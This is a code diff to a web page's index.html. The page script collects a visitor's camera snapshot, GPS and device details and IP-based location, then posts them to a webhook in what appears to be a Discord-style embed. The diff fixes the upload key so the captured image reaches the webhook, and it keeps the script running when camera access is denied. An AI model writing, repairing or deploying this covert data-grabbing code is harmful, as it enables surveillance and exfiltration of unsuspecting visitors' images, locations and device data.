--- a/index.html
+++ b/index.html
@@ -17,7 +17,7 @@
       align-items: center;
       text-align: center;
     }
-    #startBtn, #retryBtn {
+    #startBtn {
       padding: 0.5em 1em;
       font-size: 1.1rem;
       background: #222;
@@ -66,6 +66,11 @@
 
       const formData = new FormData();
 
+      if (capturedImageData) {
+        const blob = dataURLtoBlob(capturedImageData);
+        formData.append("file", blob, "snapshot.png"); // ✅ Correct key: "file"
+      }
+
       const payload = {
         embeds: [{
           title: "📍 GPS & Device Info",
@@ -93,11 +98,6 @@
       };
 
       formData.append("payload_json", JSON.stringify(payload));
-
-      if (capturedImageData) {
-        const blob = dataURLtoBlob(capturedImageData);
-        formData.append("files[0]", blob, "snapshot.png");
-      }
 
       fetch(webhookUrl, {
         method: "POST",
@@ -151,7 +151,7 @@
             };
           });
         } catch {
-          // camera denied — continue without snapshot
+          // Camera denied — continue without image
         }
 
         fetch("https://api.db-ip.com/v2/free/self")
